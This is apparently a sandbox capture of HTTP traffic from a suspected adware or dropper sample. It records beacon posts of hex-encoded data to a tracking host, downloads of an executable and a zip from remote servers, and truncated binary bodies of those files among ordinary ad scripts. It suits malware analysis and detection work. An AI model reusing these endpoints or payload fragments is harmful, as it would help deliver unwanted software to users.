Location: hXXp://s.click.taobao.com/t_js?tu=http://s.click.taobao.com/t?e=m%3D2%26s%3D35qbAmPcNZ4cQipKwQzePCperVdZeJviEViQ0P1Vf2kguMN8XjClAgeSiZ4DAJSwSWmUbzNGsoQJQ2Ds%2BV2hm%2FdhTHoLjIagalccoinlb2h3Sd4VibvlLeo0BcZWWIRYYA%2FDpPH01wK9AmARIwX9K%2BAjBDXvuqoU47FHjfsActnIQu5PdXpojKJn5AyUbPoV&ref=&et=DI4g8GpnBMZ4S%2FhJ%2FRvF2FLeaGX7Mz%2BM
Expires: Sat, 25 Jul 2015 19:14:01 GMT
Cache-Control: max-age=0
Via: rsfl01486.et2[web,302]
0..
GET /core.php?web_id=1255080332&t=z HTTP/1.1
Accept: */*
Referer: hXXp://tj.sui17.com/will.html
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: c.cnzz.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: Tengine
Content-Type: application/javascript
Content-Length: 763
Connection: keep-alive
Date: Sat, 25 Jul 2015 19:10:30 GMT
Last-Modified: Sat, 25 Jul 2015 19:10:30 GMT
Expires: Sat, 25 Jul 2015 19:25:30 GMT
Via: cache29.l2de1[0,200-0,H], cache35.l2de1[0,0], cache10.de1[0,200-0,M], cache1.de1[1,0]
Age: 205
X-Cache: MISS TCP_REFRESH_MISS dirn:7:136511626
X-Swift-SaveTime: Sat, 25 Jul 2015 19:13:55 GMT
X-Swift-CacheTime: 695
!function(){var p,q,r,a=encodeURIComponent,b="1255080332",c="",d="",e="online_v3.php",f="z4.cnzz.com",g="1",h="text",i="z",j="站长统计",k=window["_CNZZDbridge_" b]["bobject"],l="http:",m="0",n=l "//online.cnzz.com/online/" e,o=[];o.push("id=" b),o.push("h=" f),o.push("on=" a(d)),o.push("s=" a(c)),n ="?" o.join("&"),"0"===m&&k["callRequest"]([l "//cnzz.mmstat.com/9.gif?abc=1"]),g&&(""!==d?k["createScriptIcon"](n,"utf-8"):(q="z"==i?"hXXp://VVV.cnzz.com/stat/website.php?web_id=" b:"hXXp://quanjing.cnzz.com","pic"===h?(r=l "//icon.cnzz.com/img/" c ".gif",p="<a href='" q "' target=_blank title='" j "'><img border=0 hspace=0 vspace=0 src='" r "'></a>"):p="<a href='" q "' target=_blank title='" j "'>" j "</a>",k["createIcon"]([p])))}();HTTP/1.1 200 OK..Server: Tengine..Content-Type: application/javascript..Content-Length: 763..Connection: keep-alive..Date: Sat, 25 Jul 2015 19:10:30 GMT..Last-Modified: Sat, 25 Jul 2015 19:10:30 GMT..Expires: Sat, 25 Jul 2015 19:25:30 GMT..Via: cache29.l2de1[0,200-0,H], cache35.l2de1[0,0], cache10.de1[0,200-0,M], cache1.de1[1,0]..Age: 205..X-Cache: MISS TCP_REFRESH_MISS dirn:7:136511626..X-Swift-SaveTime: Sat, 25 Jul 2015 19:13:55 GMT..X-Swift-CacheTime: 695..!function(){var p,q,r,a=encodeURIComponent,b="1255080332",c="",d="",e="online_v3.php",f="z4.cnzz.com",g="1",h="text",i="z",j="站长统计",k=window["_CNZZDbridge_" b]["bobject"],l="http:",m="0",n=l "//online.cnzz.com/online/" e,o=[];o.push("id=" b),o.push("h
<<< skipped >>>
GET /api/login.php?action=status&game_id=275&server_id=57729&callback=_loginCheck&tid=3&0.8873691666707852 HTTP/1.1
Accept: */*
Referer: hXXp://p.5mnh.com/s/1/1222/29041.html?uid=907191&
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: status.login.37.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx
Date: Sat, 25 Jul 2015 19:14:05 GMT
Content-Type: text/html;charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
10.._loginCheck("");..0..HTTP/1.1 200 OK..Server: nginx..Date: Sat, 25 Jul 2015 19:14:05 GMT..Content-Type: text/html;charset=utf-8..Transfer-Encoding: chunked..Connection: keep-alive..P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"..10.._loginCheck("");..0..
POST /detail.ashx HTTP/1.0
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 38
Cache-control: no-cache
Pragma: no-cache
Host: tj.sui17.com
Accept: text/html, */*
Accept-Encoding: identity
User-Agent: Mozilla/3.0 (compatible; Indy Library)
content=3936393439333534343933343B323B
HTTP/1.1 200 OK
Connection: close
Date: Sat, 25 Jul 2015 19:16:38 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 2
ok..
GET /t?e=m=2&s=35qbAmPcNZ4cQipKwQzePCperVdZeJviEViQ0P1Vf2kguMN8XjClAgeSiZ4DAJSwSWmUbzNGsoQJQ2Ds+V2hm/dhTHoLjIagalccoinlb2h3Sd4VibvlLeo0BcZWWIRYYA/DpPH01wK9AmARIwX9K+AjBDXvuqoU47FHjfsActnIQu5PdXpojKJn5AyUbPoV&ref=&et=DI4g8GpnBMZ4S/hJ/RvF2FLeaGX7Mz+M HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml xml, */*
Referer: hXXp://s.click.taobao.com/t_js?tu=http://s.click.taobao.com/t?e=m%3D2%26s%3D35qbAmPcNZ4cQipKwQzePCperVdZeJviEViQ0P1Vf2kguMN8XjClAgeSiZ4DAJSwSWmUbzNGsoQJQ2Ds%2BV2hm%2FdhTHoLjIagalccoinlb2h3Sd4VibvlLeo0BcZWWIRYYA%2FDpPH01wK9AmARIwX9K%2BAjBDXvuqoU47FHjfsActnIQu5PdXpojKJn5AyUbPoV&ref=&et=DI4g8GpnBMZ4S%2FhJ%2FRvF2FLeaGX7Mz%2BM
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: s.click.taobao.com
Connection: Keep-Alive
HTTP/1.1 302 Moved Temporarily
Server: Tengine
Date: Sat, 25 Jul 2015 19:14:03 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Set-Cookie: miid=6574692172682403620; expires=Fri, 20-Apr-2018 19:14:03 GMT; path=/; domain=.taobao.com
Location: hXXp://ju.taobao.com/?ali_trackid=2:mm_28882711_2549618_31192338:1437851643_2k3_1682349860
Expires: Sat, 25 Jul 2015 19:14:03 GMT
Cache-Control: max-age=0
Via: rsfl01476.et2[web,302]
0..
POST /detail.ashx HTTP/1.0
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 42
Cache-control: no-cache
Pragma: no-cache
Host: tj.sui17.com
Accept: text/html, */*
Accept-Encoding: identity
User-Agent: Mozilla/3.0 (compatible; Indy Library)
content=3130333839333534343933343B3131373B
HTTP/1.1 200 OK
Connection: close
Date: Sat, 25 Jul 2015 19:15:56 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 2
ok..
GET /play/fxappimg/btn/tab2.png HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: image.anbangjiance.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Cache-Control: max-age=172800
Content-Type: image/png
Last-Modified: Mon, 01 Dec 2014 12:08:00 GMT
Accept-Ranges: bytes
ETag: "8763c7735fdd01:0"
Server: Microsoft-IIS/7.5
Date: Sat, 25 Jul 2015 19:14:18 GMT
Content-Length: 13263
.PNG........IHDR...`...T........C....tEXtSoftware.Adobe ImageReadyq.e<... iTXtXML:com.adobe.xmp.....<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.0-c060 61.134777, 2010/02/12-17:32:00 "> <rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CS5 Windows" xmpMM:InstanceID="xmp.iid:BC4A4489F07E11E3BF41F4FF42BC7C05" xmpMM:DocumentID="xmp.did:BC4A448AF07E11E3BF41F4FF42BC7C05"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:BC4A4487F07E11E3BF41F4FF42BC7C05" stRef:documentID="xmp.did:BC4A4488F07E11E3BF41F4FF42BC7C05"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>.=B...0EIDATx..}y.%E.g......(..P....mZ..{....?..GA@h....qFZ....nF.mEG.b...EE..E.S.qF.P.....>d..E.......{3.d.....7.....c2...7#"3...'.9q.@D.:.;^../!...7.3.%.}..v.Dub............._..X..G..`|.6.....O...o......:.wV.h.s./...oc..'....."'...1._...].|c..?4...`.;..;.."..J....D.|....|W.|.]4......}.....A.~...IE?.2...K^....Q...S0@E...i..\.^.......8...|.....$...@..`^/._p...|!....B..F?%....._9&..p9...7.2...\x.3. .\.!x..(B.k@7....`.....g1....;'X....L1Z.]u..c...9h.9N.....*|K.7N.K....(.bx.8. .\6...dJ3.!....<RL(..O....rs.u.h....~.H..Et.$...e...R..o!<....^%.[...Q..O;'......._.........wI.......[...0..x.-.H
<<< skipped >>>
POST /detail.ashx HTTP/1.0
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 38
Cache-control: no-cache
Pragma: no-cache
Host: tj.sui17.com
Accept: text/html, */*
Accept-Encoding: identity
User-Agent: Mozilla/3.0 (compatible; Indy Library)
content=3135313731333534343933343B333B
HTTP/1.1 200 OK
Connection: close
Date: Sat, 25 Jul 2015 19:16:15 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 2
ok..
GET /swfs/85/26497cqjd1420150506/index.swf HTTP/1.1
Accept: */*
Accept-Language: en-US
Referer: hXXp://p.5mnh.com/s/1/1222/29041.html?uid=907191&
x-flash-version: 11,6,602,168
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: kwcdn.000dn.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Expires: Sat, 25 Jul 2015 19:46:45 GMT
Date: Sat, 25 Jul 2015 18:46:45 GMT
Server: nginx/0.8.54
Content-Type: application/x-shockwave-flash
Content-Length: 1254
Last-Modified: Wed, 06 May 2015 08:01:02 GMT
Cache-Control: max-age=3600
Accept-Ranges: bytes
Age: 1
X-Via: 1.1 fuzhou191:8108 (Cdn Cache Server V2.0), 1.1 kf50:3 (Cdn Cache Server V2.0)
Connection: keep-alive
CWS.....x..VKs.E..]I.........BH.N....`..!)..z 9.'T.........Y6....|T......~.?..'N.==.J.).(t.........-...X}............/g.......#.vGA..\......p....c..T..E.8..n p.-TU......*...p...1...Pq/.Q....hv#......!...#.z..Tr t.........f.Q.}(..r...w.8..A....EQ.C............V.WT. .M-..fA....u]>.a..x....<...0...<u.XF..2...\..&..@..t.<...(.. QC.....!.5...5..>..=..q|....n...s. (W...[.R....4..B....9....T.."`.H.CW...]#."?.T.....e/tI.Dx{$...o\<.zX.6.....F~....Y....pg...o....B.s.v...x.......\....".=Q...x.s...b..p.|..]........Qx.......B.r.r."M.1..HF.8Z.......LR.`*OSA.C...)h.....G.3.......C...9p|...J..Cf.~..,.../c1..l`Vn0.SiT1....^...,He.....j]&g..4i..i..A:5.o]:........F..A..6c..lug.'.....m*\^.. .......5mW1......t#K.:e.....".,x..U3.....B2...2L[:.lN.{.I... c..#..W.}...@.t.K..#..?%...1....!y.,.... .,vq].l6............gq.."....4.x..q..{...... u..D.%J...G....f.F_.z...9...`.......9...N........d...Q....TC......_e....P..h..L....W.U...N$..... ...M......o...|...tmR....F..l.q$......d.....[Uly.([I....x"..$6....4...<.Uv..a.....).....%..{m"....Vh.p.....X>.j....=.dRk...G.3.e..O.lc..j7..:y..........D....P.j.-...j...........8Sq.<.d.=.........\}Q..N!*.......\..8...5-..../'.G..P....i.p.9Qi#W..e|?13....~D..h.a....t.......A/.3]...&..Z..............|.B?5...m.fm.g.....g...D.O...E....
<<< skipped >>>
GET /swfs/85/26497cqjd1420150506/bg.swf HTTP/1.1
Accept: */*
Accept-Language: en-US
Referer: hXXp://kwcdn.000dn.com/swfs/85/26497cqjd1420150506/index.swf
x-flash-version: 11,6,602,168
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: kwcdn.000dn.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Expires: Sat, 25 Jul 2015 19:58:21 GMT
Date: Sat, 25 Jul 2015 18:58:21 GMT
Server: nginx/0.8.54
Content-Type: application/x-shockwave-flash
Content-Length: 79691
Last-Modified: Wed, 06 May 2015 08:01:02 GMT
Cache-Control: max-age=3600
Accept-Ranges: bytes
Age: 1
X-Via: 1.1 fuzhou188:8107 (Cdn Cache Server V2.0), 1.1 kf48:0 (Cdn Cache Server V2.0)
Connection: keep-alive
CWS..?..x....XSK.6.R.A ....!........ Up R.^.%.*.! E...H........4@hR.H.^.i6p....=.=.;.?......k.Y.}.3s..Yk..x..@.. ..............`./.[cSLD.. ].g.......().....U.A..JDmmm%e.%.....Ezd`.k.b ].k.....'.=........;vu.....b.U6"..o..t..G..'.=(@)...D$( .....c......|>(....7.c..J.....yy..?.].1Fv..E.[....FM.....3......j..LTWTVQ$..'....N)k.( .......g.........2u.U.#.?a.........D.w$FO......X............pW.............o=.u....\C.\.T._w...."..>A.~..a..^................<...J.D.Cl=..g4.|$.S................R.,......ifl......CG..P..AVV.4T5Q#..j.dmUC..S..e.B......O5. ...}.W5...j...O5.`_o.....Q%k..5.L4.4.g..F.........a.....Y....=.vJ..O.........W....._..T........S-...M..........._.J....`.#._?...6...b. .......YS3S...............%.F.........B"RrJ.:?.vY.4JVYEE..g.QQ...SR..;..P.......o....cx.cbx..*J.hQ1.........2Z..^CWW.o.................?..-....`{h...... . ./. .......g.C. ....3i..@..1.7......9". D.E$C........\GUlK.Gdp....U.....!.......d.....p...{.SL.?7.w..!?.x..$. ...... .,}.H..q.m..\..~.k.....uA.4p...$@.e..'..........9.......}I.Cr."[.1s......T.^/.y..[..&...4>.....u...;5..gU}f.F{.?..FZ.....<.t...Xb.S.K....nwv.(.......i...0.....,.^D....(1.."...M8Q..=......6....YJm...NI.....W...}..5l.2.c4..V.|.Vl.......y...Bn..`...yW..J.......E....:...<...Y......!<S#6.\.l$y.....(b&,..~:.m..`.\...K.m.G....X.^f.T.......5`... 5.s. 6.-5..h...m.X..s..J..........t.i).(~......Y.^..O..........F..A...v\6.g2f]oK76RH...5F........6..e.>x..~)..s./z..?.u.Lw.@\tj.....9w].-..F..UQ.......(!.....{.}.3.FED5...E..G..Nf....<. ns.(.~.=....f..\]..x..:X_..L
<<< skipped >>>
GET /swfs/85/26497cqjd1420150506/sound.swf HTTP/1.1
Accept: */*
Accept-Language: en-US
Referer: hXXp://kwcdn.000dn.com/swfs/85/26497cqjd1420150506/index.swf
x-flash-version: 11,6,602,168
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: kwcdn.000dn.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Expires: Sat, 25 Jul 2015 19:58:22 GMT
Date: Sat, 25 Jul 2015 18:58:22 GMT
Server: nginx/0.8.54
Content-Type: application/x-shockwave-flash
Content-Length: 37203
Last-Modified: Wed, 06 May 2015 08:01:02 GMT
Cache-Control: max-age=3600
Accept-Ranges: bytes
Age: 1
X-Via: 1.1 fuzhou189:8104 (Cdn Cache Server V2.0), 1.1 kf48:5 (Cdn Cache Server V2.0)
Connection: keep-alive
CWS.....x....T...(...%...[pw'@p..-M.n....k.... 8...\._:g..3s...w_.E.....U|........l...........`.....6.. .........sqv....N.....]...........h..-,,........'............F..o.Y.O ...... ........8.....sq._e]=9,..,m8..\8.,.9.9.8.u.....m,....nn....QT.....T.@7[.O.?.-..dt....,.........8.s.......'......%....../..'.#..%$.../....G............#.'._..C....Y;......=.J..?I..l......7....em.i.l.b......./.........K........Z...............J-.........?SS...p....F{zi.........6..6.n.@ .?...6`.........Z.....X.-..6.xq..&@...E........FIV.O6.....?........<....7..............._.....R.Y.......o...?T....Vs.:.9......U...T....t.w..bW|.o...R.YM.....VS.W..|......X........%..2..Z.,....^8..?=...5..............^.....V..t.>..^.........|.yr.<G...&....`.$.KB .....3?e...t.._.I.............4.*....=2...........Zh....7.....K........t..*H...c.VZ=.F?"...~F..y....E..#^_.3.k&..../.*.....s=}.%G.n....L.JQ...I.3..d...{.r.5g.......S....Y9...1)i.\...........D..u.d...M..}.......z....B.M.3.._.=...g......S.SU.Q.7.1#.. .....N.;..b..n...D.E.....*..*.y....4.H..J....O~...&`.k..l.....d'.`.J{.../..s....,.\....6r*....]..sp..z..'.......(...|.. ...FG..._.`........6. .AL.W.....[ue..e..*....z.L#.J..g..s......X`..p7T..5..^0.]rW..2.u.]..........2..:Ma......I..l.........HF.....E30.......I.......C..v........^Kw..ee........Kl..D....A.....2.....].'S...n.e.aN^.N.....D;.FX.X..d.W.n%.A....1CV..2=........H... .._.w......F... }u.'....l..... ..4...@...`.1....*.[X*..K.v.XE.Mo.....[. ~.......SoP...S.o.......Te.._...E...-.S.6...%cH.3..I=x..o...~.<.e....K.=S.U,.........8..K....5..T
<<< skipped >>>
GET /swfs/85/26497cqjd1420150506/reg.swf HTTP/1.1
Accept: */*
Accept-Language: en-US
Referer: hXXp://kwcdn.000dn.com/swfs/85/26497cqjd1420150506/index.swf
x-flash-version: 11,6,602,168
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: kwcdn.000dn.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Expires: Sat, 25 Jul 2015 20:08:32 GMT
Date: Sat, 25 Jul 2015 19:08:32 GMT
Server: nginx/0.8.54
Content-Type: application/x-shockwave-flash
Content-Length: 27665
Last-Modified: Wed, 06 May 2015 08:01:02 GMT
Cache-Control: max-age=3600
Accept-Ranges: bytes
Age: 1
X-Via: 1.1 fuzhou188:8105 (Cdn Cache Server V2.0), 1.1 kf50:9 (Cdn Cache Server V2.0)
Connection: keep-alive
CWS.I...x....\.m.7z.."% .-. " .-......H.H.HH.C#..]3Hw.J...g...y...g.}.....o.......u....f~.. n...;..#.....%...\......sN......wd%e$...K.~.....LT4.L..w1...01o.F..#.b..'%..D.KJJJ...>?#.>.!.!......!5../....K%.X.8D....D..dD...w..(.9.i..p.p..YY/..9.i...(.9/eY.).Y...J...[.V..7...Dl..........7.....BD...t...(s.@@./...DFFD.q....l$.*...w..9U....Ss...8./ GF..22qr.|>@..8...........pU.......B..._..F....n...:.6"....#\.g..T.M....:|sD.....p:FaK.......O6~......oC.Y.i.....2k..R.Po|...c...N}.\.0..[...h4d.........<...(.....jH..H.!<.m....&.....J,.W....t..../|5...9...b...T...~......&....tl>LyO...... Q}..V....TX.s....i.."N...mmC.u...G.*ep...'....%....4..Z1...,.?....B...!...(..x.."...<... ...x..........Y..#...""........9........j..L.2...........,F[....P"a.....P/............y...,Bt.6..F.pj......!.h.i...1`P).d%}.w..2..$......N.b....}L.P....]..W.'$.@?.'0...........4..S/,.6....h).......b..%5..[w...m ... ..:.E.......C{.%...(&.1...z..U...^U..I...^.O6.D.@.].........)...T...w....p4.......og.".3.Fh......TM.>...V|..e.;j....tn6 .@'...x..B....\.e..h.....GX16|.D.EZ....JU..9....u..d.eD...5.G...7..m.mL..l.a.....'?jX.<.@....:f.\.;/....<.|.70.S..c_a=........T.-.h...w-,.fnVT,.....&..E..f...HU....W.!....)#:2.s.l.-.o.7....T.'.S..L......U.....K'..>W$"-k..n.}..Y..>.._...C...:.......Q...#.......^l`.P=.X8)Q.}.....)3a...Q...._Pb"F...Z%..(..v>.,.,....e".V/IF..?.."..sX5.&...2o..1..LV.j..v....?.s....~..T..U.....S.......m....Z#..z......k.....n.6...".ui.k...A..K.wVIw_......6....A..u.B5@..T.,k..P..D)o.#...".......w.{;>...5...
<<< skipped >>>
GET /js/shunfeiCL.js HTTP/1.1
Accept: */*
Referer: hXXp://p.5mnh.com/s/1/1222/29041.html?uid=907191&
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: kwcdn.000dn.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Sat, 25 Jul 2015 19:14:05 GMT
Server: nginx/1.4.2
Content-Type: application/x-javascript
Content-Length: 387
Last-Modified: Mon, 21 Apr 2014 12:49:58 GMT
ETag: "535513f6-183"
Accept-Ranges: bytes
X-Via: 1.1 szhj72:88 (Cdn Cache Server V2.0), 1.1 kf50:5 (Cdn Cache Server V2.0)
Connection: keep-alive
(function() {...var c = document.createElement('script')...,p = 'https:'==document.location.protocol;...c.type = 'text/javascript';...c.onload = function(){....window.BX_CLIENT_ID = 34770;....BDX_DMP.trackPdmp('.........37......');...}...c.src = 'hXXp://stuff.cdn.biddingx.com/js/vc.min.js';...var h = document.getElementsByTagName('script')[0];...h.parentNode.insertBefore(c, h);..})();HTTP/1.1 200 OK..Date: Sat, 25 Jul 2015 19:14:05 GMT..Server: nginx/1.4.2..Content-Type: application/x-javascript..Content-Length: 387..Last-Modified: Mon, 21 Apr 2014 12:49:58 GMT..ETag: "535513f6-183"..Accept-Ranges: bytes..X-Via: 1.1 szhj72:88 (Cdn Cache Server V2.0), 1.1 kf50:5 (Cdn Cache Server V2.0)..Connection: keep-alive..(function() {...var c = document.createElement('script')...,p = 'https:'==document.location.protocol;...c.type = 'text/javascript';...c.onload = function(){....window.BX_CLIENT_ID = 34770;....BDX_DMP.trackPdmp('.........37......');...}...c.src = 'hXXp://stuff.cdn.biddingx.com/js/vc.min.js';...var h = document.getElementsByTagName('script')[0];...h.parentNode.insertBefore(c, h);..})();..
GET /ParamFile/icos/20150713014932.ico HTTP/1.1
Connection: close
Cache-control: no-cache
Pragma: no-cache
Host: tj.sui17.com
Accept: text/html, */*
Accept-Encoding: identity
User-Agent: Mozilla/3.0 (compatible; Indy Library)
HTTP/1.1 200 OK
Content-Length: 67646
Content-Type: image/x-icon
Last-Modified: Mon, 13 Jul 2015 05:49:32 GMT
Accept-Ranges: bytes
ETag: "ea5c3b02fbdd01:6a3"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 25 Jul 2015 19:15:55 GMT
Connection: close
............ .(.......(............. ...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
<<< skipped >>>
GET /setup/update.zip HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: update.zchon.net
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: Tengine
Content-Type: application/x-zip-compressed
Content-Length: 690071
Connection: keep-alive
Set-Cookie: _alicdn_tc=AQAAACAinHBqWQsAvRA5JWjKVgfn61FQ; Path=/; Expires=Sat, 25-Jul-15 20:14:47 GMT; HttpOnly
Last-Modified: Tue, 07 Jul 2015 18:31:45 GMT
Accept-Ranges: bytes
ETag: "80fe3f2de3b8d01:27a"
X-Powered-By: ASP.NET
Date: Sat, 25 Jul 2015 18:45:59 GMT
Via: cache29.l2et2-1[0,304-0,H], cache38.l2et2-1[1,0], kunlun8.cn125[0,200-0,H], kunlun8.cn125[1,0]
Age: 1728
X-Cache: HIT TCP_MEM_HIT dirn:9:114795697
X-Swift-SaveTime: Sat, 25 Jul 2015 18:52:07 GMT
X-Swift-CacheTime: 3600
PK...........F.S..>...........gpmc1.cab.g...q.W.%5t,.*2U[k..[..t.ZC.8o.y.L.G.}'..............E.V.........bc.*@...4.........3...............}. ...r......&.w.q.......K.....*z...=.A..dmY2...E"0(5.R.i.....]..u.0..L...y0..:...%.2WGB...,.[..._)..U...;I.IT.lg.,t!..._.XV........=._6..h...3.K .5t.t...Y.]].q...e}..o.k.1.*............A\.c..F.~.;.Y.T....a...q...|.Lj7..z..).tG....HR.*jk..........\....... .e.e..=....`.'....Y'|.H-1..`0..^$..W....AW{k.=.#.........7r.Y.........'j\P..G.....HP..Y.?J~.c.`.k..VY.Pn..c...a..... Q....tx..9...H.Q...{...sG{,D=...O..-..m.w...`s.?.:.Z/...B...&..G...W...B.#....lj.......XC^C,*G0h....(`.>l5..........5.1........d.\.........W....)P.....|!g.b!FJv.r....Q..K.u...s!|zLs"..r..`......!.......".......f&.4;.......h....>..j.x'.#.....4si@|....:.A.]...V.J.mNUc.J5.9.Ft.V."..P.n...>..=s.HJB...#..YJC.A2.KJ.$n...gv1.V.ix.... ...w-`S.M..N..i...g.s.... ..E.....[.1.%.X...z'..i.}..c|[.].3.....AQ.a..0~.......I......I.c.^a.C...q.]:.m......`.W-..mQ1P...!..2."..~.x6..r. ...w`.....;....p..x....<.....7.di..0.n.......0.9@M....#.........sc|{h...s..m.&.-.........J{.N..RR..q.AE.mU.(S.}..b.p:.7].JC.WqL.4...............z}Z.MN...3PE.HY-N........!...R{LD.i...,^1&........[.4.).2....MX.6...:....;..qy&..B...C.kj..e.........W..Axae^.w...a...im....<.3...(TS..z.s#.6< Rt.(.2..s[..2.h0].3%..a..............5g.b.N. ..D-.....DLJ......:..cS............8......vR.X......{.?5...........W.l..S ..jp..1j.E..9wE3x.......jv0d.@...7#..;..g.T7.M..Z.a.V!..Qc..&.\..9.....~..Z.,.....R.~U..k..;.f6..@......*S..@0.v.&.nS,@.$.,.J...
<<< skipped >>>
GET /setup/setup_30015.exe HTTP/1.1
Connection: close
Cache-control: no-cache
Pragma: no-cache
Host: download.juezhao123.com
Accept: text/html, */*
Accept-Encoding: identity
User-Agent: Mozilla/3.0 (compatible; Indy Library)
HTTP/1.1 200 OK
Server: nginx/1.2.1
Date: Sat, 25 Jul 2015 19:10:45 GMT
Content-Type: application/octet-stream
Content-Length: 643264
Last-Modified: Mon, 13 Jul 2015 02:57:57 GMT
Connection: close
Accept-Ranges: bytes
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1p.:u..iu..iu..i...iw..iu..i...i...id..i!2.i...i...it..iRichu..i........PE..L.....oS.................\...........2.......p....@..................................8.......................................s...........'..........X...h'...........................................................p...............................text....[.......\.................. ..`.rdata.......p.......`..............@..@.data................r..............@....ndata.......@...........................rsrc....'.......(...v..............@..@........................................................................................................................................................................................................................................................................................................................................................................................U....\.}..t .}.F.E.u..H.....6B..H.P.u..u..u....r@..B...SV.5.6B..E.WP.u....r@..e...E..E.P.u....r@..}..e....Lp@........FR..VV..U... M.......M....3.....FQ.....NU..M..........VT..U.....FP..E...............E.P.M...Tp@..E...E.P.E.P.u....r@..u....E..9}...w....~X.te.v4..Dp@....E.tU.}.j.W.E......E.......@p@..vXW..Hp@..u..5<p@.W...E..E.h ...Pj.h..B.W...r@..u.W...u....E.P.u...\r@._^3.[.....L$...7B...Si.....VW.T.....tO.q.3.;5.7B.sB..i......D.......t.G.....t...O..t .....u...3....3...F.....;5.7B.r._^[...U..QQ.U.SV..i.
<<< skipped >>>
GET /b/1/1377/gdd9fid.swf?uid=507191 HTTP/1.1
Accept: */*
Accept-Language: en-US
Referer: hXXp://VVV.feitian001.com/html/click/7191_653.html
x-flash-version: 11,6,602,168
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: c.tb1u.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx/1.4.2
Date: Sat, 25 Jul 2015 19:14:05 GMT
